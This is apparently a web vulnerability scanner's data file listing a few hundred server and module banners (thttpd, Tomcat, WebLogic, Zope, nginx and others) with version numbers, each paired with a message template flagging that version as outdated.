"600777","TagWeb/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600778","TAuth/","1.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600779","Tcl-Webserver/","3.4.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600780","TeamFile/","2.1.2-4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600781","TeamTrack/","6.1(61025)","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600782","TeleFinder/","5.7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600783","Temple-of-Hate/","9.1.1-1.3.31","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600784","Texis-Monitor/","5.01.1161965127","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600785","THEO Server/","5.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600786","ThreadedDBL/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600787","thttpd/","2.26","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600788","Thunderstone-Texis-Vortex/","4.02.1047973790","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600789","Thunderstone-Texis/","4.03.1052723967","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600790","Thy/","0.9.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600791","tigershark/","3.0.128","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600792","TinyWeb/","1.93","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600793","tivo-httpd-","1:8.3-01-2:540","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600794","TKTAuth/","1.3.7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600795","Tomcat Web Server/","3.3.2 Final ( JSP 1.1; Servlet 2.2 )","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600796","Tomcat/","4.1.34","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600797","tracd/","0.12.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600798","trakkerd/","v2.87-mm-as+re+ex+mp-WAP+WML","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600799","Tree/","8.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600800","TSM_HTTP/","0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600801","TTP/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600802","TUX/","2.0 (Linux)","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600803","TuxSQLConf/","20070207-00","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600804","TuxTrafficLogRotate/","20051209-00","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600805","Ubicom/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600806","UcoZXSrv/","1.4.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600807","UHTTPServer/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600808","Ultraseek/","5.8.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600809","UNIT_Homepage/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600810","UnrealEngine UWeb Web Server Build ","436","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600811","UPS_Server/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600812","UserLand Frontier/","9.0-WinNT","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600813","UserWeb/","v2.65","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600814","uWS/","2.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600815","v.ii/","0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600816","v2h/","1.5.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600817","VCNET2-Server/","1.03","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600818","VDB/","1.1.1-se","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600819","Vernier/","5.2.0.63","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600820","vhostdb/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600821","Viking/","1.9","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600822","Virata-EmWeb/","R6_2_1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600823","VIRTUAL/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600824","VisiBroker/","4.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600825","VisualPulse (tm) ","3.0c","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600826","Vivasoft/","8.8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600827","VM_ESA/","2.3.0.9902","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600828","VM:Secure/","2.5A","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600829","VM:Webgateway/","03.1A","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600830","Vorlon SR ","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600831","Vortech_PHP/","0.1.0-p0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600832","vqServer/","vqServer/1.9.55","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600833","w/CBS::adtag/","1.0a","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600834","w/CBS::gettxt/","1.0a","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600835","WC/","3000","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600836","WDaemon/","10.0.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER). Versions lower than 4 have serious vulnerabilities." "600837","Web Crossing/","4.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600838","Web Sphere Application Server/","5.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600839","Web Transaction Server For ClearPath MCP ","6.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600840","Web_Server_4D/","3.6.1b8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600841","Web-Server/","3.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600842","WEB602/","1.04","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600843","WebAuth/","3.7.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600844","WebBase 4.5 build ","69","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600845","WebCo/","Build9708-2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600846","WebCollage-Syndicator/","3.2.4.4040","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600847","WebCompanion/","6.0v1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600848","webfs/","1.21","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600849","weBLink/","0.3.9","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600850","WebLogic ","5.1.0 Service Pack 9 04/06/2001 12:48:33 #105983","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600851","WebLogic WebLogic Server ","7.0 SP2 Sun Jan 26 23:09:32 PST 2003 234192","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600852","WebLogic WebLogic Temporary Patch ","5 for PeopleSoft","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600853","WebLogic WebLogic Temporary Patch for ","CR067505 02/12/2002 17:10:21","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600854","WebLogic/","7.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600855","WebOTX_Web_Server/","1.3.36","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600856","WEBrick/","1.3.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600857","WebSEAL/","6.1.1.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600858","Webserver/","2.71828183","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600859","Webshare/","1.2.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600860","WebSiphon/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600861","WebSite/","3.5.19","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600862","WebsiteFactory/","0.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600863","WebSitePro/","3.1.13.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600864","Websphere/","4.0.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600865","WebSphereApplicationServer/","8.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600866","WebSrv/","3.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600867","WebSTAR/","4.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600868","WebTen/","3.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600869","WebtoB/","4.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600870","WebTopia/","2.2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600871","WebTV/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600872","WebTwist/","3.0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600873","WebWhois/","2.0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600874","WebZerver/","V06.04","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600875","wg_httpd/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600876","WhatsUp_Gold/","8.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600877","whostmgr/","whostmgr/3.9.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600878","Wind Manage/","4.00","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600879","WindManage/","4.00","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600880","Windows-IIS/","5.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600881","WindWeb/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600882","WISE_Homepage/","1.0.7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600883","WN/","2.4.7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600884","Worldgroup/","3.30","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600885","WSGIServer/","0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600886","wti-httpd/","1.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600887","WWW Server/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600888","WWWServer/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600889","WYM/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600890","X-IVO/","1.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600891","Xauth/","2.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600892","Xeneo/","2.2.10","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600893","Xerox_MicroServer/","Xerox11","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600894","Xerver/","4.03","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600895","Xgate/","3.00","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600896","Xitami web server ","v2.4c0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600897","xs-httpd/","3.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600898","XunleiHttpServer/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600899","Y.G.Apache-SSLv3/","1.3.9","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600900","yasl/","2.25","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600901","YAWN/","1.05","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600902","Yaws/","2.49.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600903","z_VM/","4.4.0.0000","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600904","Zend-LaunchPad/","1.0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600905","Zeus/","4.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600906","Zope/","Zope/2.11.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600907","ZOT-PS-15/","6.8.0104","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600908","ZOT-PS-30/","8.2.0004","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600909","ZServer/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600910","ZyXEL-RomPager/","ZyXEL-RomPager/3.02","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600911","SAF/","4.0rc1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600912","Twisted/","2.1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600913","Plone/","3.3.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600914","CovalentSNMP/","3.0.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600915","Snap Appliance, Inc./","4.0.860","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600916","CJServer/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600917","Devshed/","2.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600918","mod_bla_bla_bla/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600919","G4200.GSI/","2.22.0131","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600920","KONICHIWA/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600921","CatWalk/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600922","CERNhttpd/","3.0.A(Unix)","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600923","mod_transform/","0.6.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600924","mod_auth_ianus_sso/","1.15","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600925","LANDeskManagementAgent/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600926","WebKnight/","2.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600927","AOLServer/","4.5.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600928","SE/","0.5.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600929","Sun-Java-System-Web-Proxy-Server/","4.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600930","Jetty/\(","8.0.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600931","iSpit/","1.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600932","Phusion_Passenger/","3.0.13","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600933","Sun Java System Application Server ","9.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600934","tinyproxy/","1.6.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600935","ntop/","3.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600936","Mono.WebServer2/","0.2.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600937","mod_log_online/","0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600938","mod_apreq2-20050712/","2.1.3-dev","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600939","JSF/","1.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600940","HTTPGW/","1.1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600941","AAISP/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600942","AppleIDiskServer-","1G301009","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600943","Apusic/","4.0.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600944","cheyenne/","2.2.8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600945","GlobalSCAPE-EFTServer/","6.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600946","GlobalSCAPE-SecureServer/","3.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600947","InteSoft-ASPAccelerator/","3.7.5000.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600948","iPyramid.system2/","2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600949","MailEnable-HTTP/","5.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600950","mod_copstng/","2.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600951","mod_ddmh/","0.0.16","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600952","mod_defer/","0.1.lk","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600953","mod_dp20/","0.99.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600954","mod_gnutls/","0.5.9","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600955","mod_lisp2/","1.3.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600956","mod_top/","2.2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600957","mod_vhost_online/","1.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600958","ModemNV3/","1.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600959","Simple-Server/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600960","TinyHTTPProxy/","0.2.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600961","WDaemon/","10.0.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600962","WebMail/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600963","WWW-KODEKS/","4.10","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600964","YTS/","1.20.10","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600965","OpenCms/","7.5.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600966","Mbedthis-AppWeb/","2.4.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600967","WebProxy/","5.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600968","MicrosoftIIS/",".6.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600969","Cherokee/","1.2.101","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600970","debut/","1.08","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600971","DnionOS/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600972","FAV-WebSRV/","1.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600973","gorgona/","2.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600974","HASPLM/","13.20","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600975","IntotoHttpServer//","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600976","ISS/","7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600977","LotusExpeditorWebContainer/","6.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600978","mod_fcgid/","2.3.7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600979","mod_scgi_pubsub/","1.11-pubsub","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600980","mod_vhs/","1.0.32","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600981","PowerBoutique/","2.2.3/10.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600982","RemotelyAnywhere/","8.0.668","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600983","SERMEPAServer/","0.9","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600984","TongWeb-Director/","4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600985","uServ/","1.5.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600986","AdventAPAuthS/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600987","CPLIMS/","3.0.8.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600988","HDSHi-TrackServer/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600989","JuniperNetworksNitroCache/v","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600990","MochiWeb/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600991","SWS/","3.8.024","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600992","bit_asic/","3.8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600993","ASERVER/","1.0.12","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600994","BarracudaHTTP2.0/","2.2.10","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600995","HZV/","2009","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600996","HintSoftWS/","1.0.00","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600997","Jetty/","5.1.8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600998","LiveWorld/","cc_2_048","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "600999","NIServiceLocator/","1.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601000","PowerHomeWebserver/","2.1b","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601001","Seminole/","2.64","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601002","Serv-U/","11.3.0.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601003","SiemensGigaset-Server/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601004","TWebAP/","2.1.2.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601005","TornadoServer/","2.2.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601006","W3MFC/","1.68","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601007","WebROaR-","0.3.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601008","WingFTPServer/","3.5.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601009","afts/","0.9.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601010","corehttp-","0.5.3.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601011","dhttpd/","1.02a","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601012","gSOAP/","2.7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601013","mod_apreq2-20051231/","2.6.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601014","mod_flog/","0.4.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601015","mod_hcgi/","0.9.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601016","mod_musicindex/","1.2.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601017","mod_ort/","1.00","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601018","mod_qos_control/","7.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601019","nginx/","1.2.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601020","sw-cp-server/","1.0.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601021","Oracle-iPlanet-Web-Server/","7.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601022","CVOS/","3.9.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601023","Zeus/","6_0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601024","mod_lo/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601025","mod_ruid2/","0.9","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601026","mod_cluster/","1.1.x","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601027","mod_aspdotnet/","2.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601028","mod_antiloris/","0.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601029","PRTG/","9.1.3.1792","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601030","DMCRUIS/","0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601031","Easy-WebServer/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601032","EdgePrism/","4.0.10.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601033","FlashCom/","3.5.7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601034","sqlmap/","1.1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601035","IOSFirewallHTTP/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601036","IPG/","7000","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601037","KWS/","2009","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601038","KWS2009/","12","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601039","junction/","1.3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601040","LITBWS/","1.0.10","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601041","Beacon/","3.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601042","Asterisk/","1.8.5.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601043","BinarySEC/","3.1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601044","CentileEmbeddedHTTPSdserver/","4.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601045","CM4all-JailCGI/","1.3.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601046","cPNginx.Co/","0.8.5.2","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601047","Dahlia/","1.0.7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601048","DataONTAP/","7.3.2P7","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601049","Formilux/","0.1.8","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601050","gunicorn/","0.14.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601051","HBS/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601052","HOJ-WebServer/","0.2.11","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601053","HTTPProxy/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601054","ipOS/","7.6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601055","IQhttpD/","1.007oct2007","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601056","JavaPseudoHttpd/","0.4.5","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601057","LiveCache/","2.4a","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601058","LuCId-HTTPd/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601059","m4vh/","1.2.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601060","mini-http/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601061","nCore/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601062","NetworkActiv-Web-Server/","3.5.16","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601063","nginxvta/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601064","Noelios-Restlet-Engine/","1.0rc3","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601065","OwilAppserv/","1.30","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601066","PHP5/","5.2.14","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601067","POSIXDLNADOC/","1.50UPnP/1.0.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601068","qjy168/","1.0","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601069","Rocket1.0.6aPython/","2.6.4","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601070","SAPNetWeaverApplicationServer/","ABAP701","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601072","TembriaWebServer/","1.1","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" "601073","TongWebApplicationServer/","4.6","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)" 